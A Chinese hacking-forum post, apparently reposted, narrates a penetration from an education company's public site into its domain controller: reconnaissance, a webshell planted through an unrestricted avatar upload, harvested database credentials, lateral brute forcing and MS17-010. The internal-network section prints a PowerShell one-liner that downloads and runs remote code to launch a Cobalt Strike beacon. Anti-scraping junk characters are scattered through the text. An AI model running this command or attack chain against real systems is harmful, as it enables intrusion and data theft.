找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2117|回复: 0
打印 上一主题 下一主题

渗透实战 | 从外网直接打到内网全过程

[复制链接]
跳转到指定楼层
楼主
发表于 2024-3-1 19:41:32 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

1 s3 z3 k# R/ q 这次渗透是一个从01,从外网到拿下域控的实战过程,希望可以给大家一些思路0 U5 T. z# J$ B' m! v/ R

7 M* z9 [+ G9 s) @

; U& O. t" K# V) Y+ C4 r   / Y& B% n5 g2 F) g! X, ~

. J( R0 g# P. x

4 J7 g( j3 q; _9 ?# Z( {( w 正文 K( B8 ~+ D+ ~) A

6 ?; |( H! X9 Q$ ~- P+ X! ^" h

$ R- q( f. M* i. f0 r& t  - g$ z: L, X2 `

2 K' s1 J1 v" V1 S: ?- x5 I! s

3 R; _# A( r# s4 i4 Z& ^9 p 目标:www.xxxx.com(一家教育机构)
- V, _ e* H. z# w) u9 J
打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能
: G4 K% M8 p v( Q' l B0 ]; m

/ [& i' O9 _3 t/ S2 i

5 u# t9 p- v) b2 L" {1 ?+ n" ~2 ] vshapes= . h A; M7 S& R# p' q- P

4 o; {3 u' L9 I) F

, z* {2 v3 W2 q 进行了简单的信息搜集
# K% n. q q0 d) c1 ^
3 {' V+ C3 l/ H3 _
% l/ P4 o, s: l5 A

9 ?6 s8 P2 l% A" R5 z6 N

& [7 X+ G% L" s" i( b& g; j" [ 子域名搜集 $ ^2 i2 G1 J" b+ t* Z+ W b+ h. \

3 ]0 h: J" s& e L

9 `( k& n8 { N3 T$ e; Z vshapes= 7 |% E! y( s6 A! N3 M4 @

! K) x' \$ h1 J: A

4 ]/ S6 B, s% k/ m' `7 u0 q! N fofa找资产
7 p0 T- r& S# @: l; @
! p& H# O# \: Y# g2 A1 A& o
) @) c( u+ n; P6 M

( ]* ~( [1 |2 m( `, E. r9 }* P

$ e2 W$ L" b8 r2 V2 j) o vshapes=9 w1 E, T7 a) L( d3 j, `# v

; I: r) B: V( M4 T$ s! k' z/ z

0 f; \, n& i3 e 一共七个资产。去重之后只有两个。
: J% j3 G9 W' w, h9 T+ H
3 ^! p. a# D2 D1 O6 X- n1 w6 M
/ N$ n% u5 m" T7 I8 W" Y0 e. G) l+ @

; r; Q- I% R) F/ |8 _5 z

% l& O/ d) v: O 目录探测: |- x, b" l5 [$ r( `3 e: s6 m

. A! Z" U" d3 N& p

9 W% J* [" i; p% [" g! j vshapes= ' Q% m C& A! W2 B, z

* r; {2 y( }; p6 J# P _! `

9 l1 u5 z+ P& X% i' i 我尝试了暴力枚举,看有没有弱口令之类的,然而并没有
$ i/ d/ g: Y) o+ i
. Q* y h8 ]1 o8 |0 y
+ E. \; F |3 M. b" G* o n* i

4 E2 Z, ~& } O9 G' R* ]0 [/ _

" d, g0 @% B5 c2 d8 a& j0 [* U! q 我又尝试了通过修改返回包来绕过登录界面! K! L4 C! h- n! I

# \: s" Y0 [& m% N1 G4 `1 {

1 X3 p2 D x# H$ y: W6 S$ g vshapes=; y; X+ u5 k5 [ _! R

' ?# ]: q& N* m' c1 R6 o

& N& e$ G8 C; ]2 L# ~. v 还是不行,尝试注入无果2 P ^. G5 a4 E/ _2 L( M P

' V2 h- r- \1 U5 I; j% Y( e& P3 e

7 Y" |7 f" h2 u/ E3 I9 t2 w. S+ l/ @ vshapes=! n( U& x+ @8 K% b5 H

8 @3 S5 W$ R% y9 B1 V' @

" s+ O, i) M4 ^' o 不过我目录探测出了一处Spring信息泄露
' F* B) r e: j7 {& d3 ~/ P
A% x4 s) \+ D
5 F$ Z- G2 j( }$ m. b

7 r1 Q2 {& p0 o& W2 { l# l m7 I

0 `4 ?! p" n' V. m1 d7 {, s vshapes= , Z: L3 {) H h/ _/ o

; Q( _; V' R" L+ s, v, o7 c9 P* ~

1 ^; i( z; x: d- i 尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录8 J# d+ n+ s0 z% E

$ {; H- J$ d4 X* \' c

$ C9 @2 M( N; s9 H% X vshapes= / a: s, B" c& t" n& S

2 b4 ]6 Z( k* \9 s4 [$ Y

& [- b. U, r9 U: V q/ G 后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。) H9 s7 h; B& S! ]

5 Q; g6 i- z0 d

* h; j, O5 p+ G vshapes=$ P( S4 X# \, r2 A- M* H

1 x$ Z6 p; j! \9 D# O: N/ r8 `

! p$ I" M$ F8 c 获取有些师傅到这一步就手机抓包电脑测了。 2 _1 L+ F. P! @

1 t# I1 X7 I# e, k/ X2 h, ~

I: d% ?8 _3 `: I3 \9 A2 e* a2 J7 y: k Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。/ T" s( L: p/ _. h: A

4 `4 X4 l9 b- y: k

* [: x( I/ c' w+ a9 V$ p 其中在一个公众号发现了小程序,可以进行注册。 ! [% s4 [' d# ?" q

0 H0 d7 Z, Q. Q, ?# T# ~4 n

. H+ E" _ x! m+ J( S5 N 看到了头像上传,尝试上传获取WebShell5 X5 |9 A! r5 M$ e6 ]% X+ M

( Q0 V6 `8 O" {) M& ~5 ~

0 v% S' T6 |, U% o7 H/ { vshapes= : d; ]* c# q! ]. {

5 H' ?2 w- V$ C$ h2 r6 F

7 H; j( _( E* L' o 未做任何限制成功GetShell,上了冰蝎马,目录没权限访问3 i% Q% h& U7 g& }

1 l$ a# ~. P& r+ o

& H& Y q4 V8 {* K8 |0 P" v vshapes=' @3 S) u4 [5 i; S: L [

/ @7 f0 l& S) P* X0 l) o+ ~ t/ M8 l. {- I

8 ` h# ^$ P- i1 r4 {7 V 然后上了大马 : U: J3 }& o: p! i, O9 X% N/ C

+ w6 h3 l& o( r/ e

6 I: h% V, f4 j: m u0 ]$ N p vshapes= 4 I2 [& W1 N/ v4 d/ u' l

# g% v' u9 I6 m

9 n) C( K0 c. t/ V' F0 W( h vshapes=9 Y) T) I. `- F& a+ ?' }

% |& R9 F( K2 ]

8 M6 W1 C, P G- I 通过翻找文件发现数据库账号密码0 M* U. [7 `* q4 T; e; r2 G

/ L! ]- S, v( N0 J$ Y

$ ?3 ~* c% e9 K5 u, C vshapes=5 f; b7 I9 [+ x3 M3 h7 B- P8 }

4 @ s8 I0 b2 {5 u. A5 _( _

3 D3 @# ^: A: s --内网渗透0 @, l/ D8 i0 ?

! K: \5 c2 |5 I( C! f

0 d5 w! m* y3 s* W7 L" i, C 直接通过powershell执行 cs上线6 C" v+ ]8 X2 H2 V$ }" ? r

' K8 [5 @# B" i" P

* G& r. q5 m5 K powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))"% }* q' O, F0 w! R$ W

9 R4 ? g/ _5 @6 q: h

+ g- \9 O. J: f% T3 Y1 t$ } G' U vshapes= - l4 k/ Z I6 t, M2 x

6 Z, n) {" R7 A w

4 k" U* M- [7 f- S 进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破 ) x3 X' p9 z* t5 u

& i( C) Z# ~" T4 L

# E6 f+ Z6 I: h* @+ l: K vshapes= 2 G0 M8 Q% q8 U3 R6 t) E

& \, u: t& ~" _- Q1 w

1 N+ b$ _! B- b+ j/ H' |/ G6 _( m 登录爆破出来的服务器,发现多网卡且存在逻辑隔离。
) z( T) R8 ^4 ]
0 Y+ W v8 D H- N, K6 Y6 R
3 _1 H- T5 H5 U% p9 I2 P: ^% k% Z" W
6 J: `; \: M9 C) n8 Q1 J n4 }

! I1 v' y) S1 A: ?" E/ c2 ^0 |- j

/ P' D+ n( I( k( G vshapes= / k4 }; r g/ Q

( K6 s8 B* c% T O2 x( r

# m# O1 @2 h+ f; G) _2 O3 { 通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭
( B3 d- Z l; l E$ a" P
% o1 X1 k' s6 D2 C) }
1 u0 f+ B$ N- d$ N" [5 {

: J; I3 l; {. N( }0 K

" B* U* [( h) [& _ vshapes=- ?* b/ S( g5 n2 ^

6 A+ W/ k7 B9 ]8 z1 |3 g! v9 l

1 B5 C# |. T0 R1 Z
" _" ^1 U. A& f" J( j! F' e& ]
V8 U( ~; r& ?/ j7 f
' T. n. \9 w+ `( x8 z

6 X! R5 H) i8 r% E# a' T

0 x# L; q- d" M+ H   & o; n/ q$ s# _2 |; J4 z q: }

; q; b" e) @5 G0 \+ b

1 f( u+ ^, Z5 {- q; k/ R1 R 小结 ' h3 t- F8 K, t; F2 S* @" `

1 b' p$ d: t$ s' e" E

! K" }. O6 a6 O; F  9 C2 K L& _: `% F

( z i7 B* W, I* j

( s. C8 e; p7 B7 m7 s8 M 在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路!/ _4 z% G- I/ O4 s. ?- Q

2 B7 ^3 M& S8 I7 g. m' h4 e

9 ]5 l, s( e8 ^. J) x+ o, k  7 a6 a! `) x3 g( ?# @

' L! V4 h' q1 q% l3 x
    + {1 d# o: f+ U% I6 B
  • 2 r' i. e8 ]& f. ]   ) |4 i. F! ?- ?' F2 e
  • 7 G- D. z. n# _% b4 z, B. I
  • 3 E& H* e! `$ ]$ z   5 d8 x2 S4 ?, K5 y7 r+ n
  • ; m4 ]2 q( M9 N0 G
$ y) O2 L% w6 C/ c7 L

0 j5 Z/ @, d; |7 C- I: h F) P 作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html # o# T3 |3 _% m; U

, c# H4 d+ v) h I! o) p

/ f& n* k8 ?& ?. E  ! c2 o/ H0 Z9 N; L9 R

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表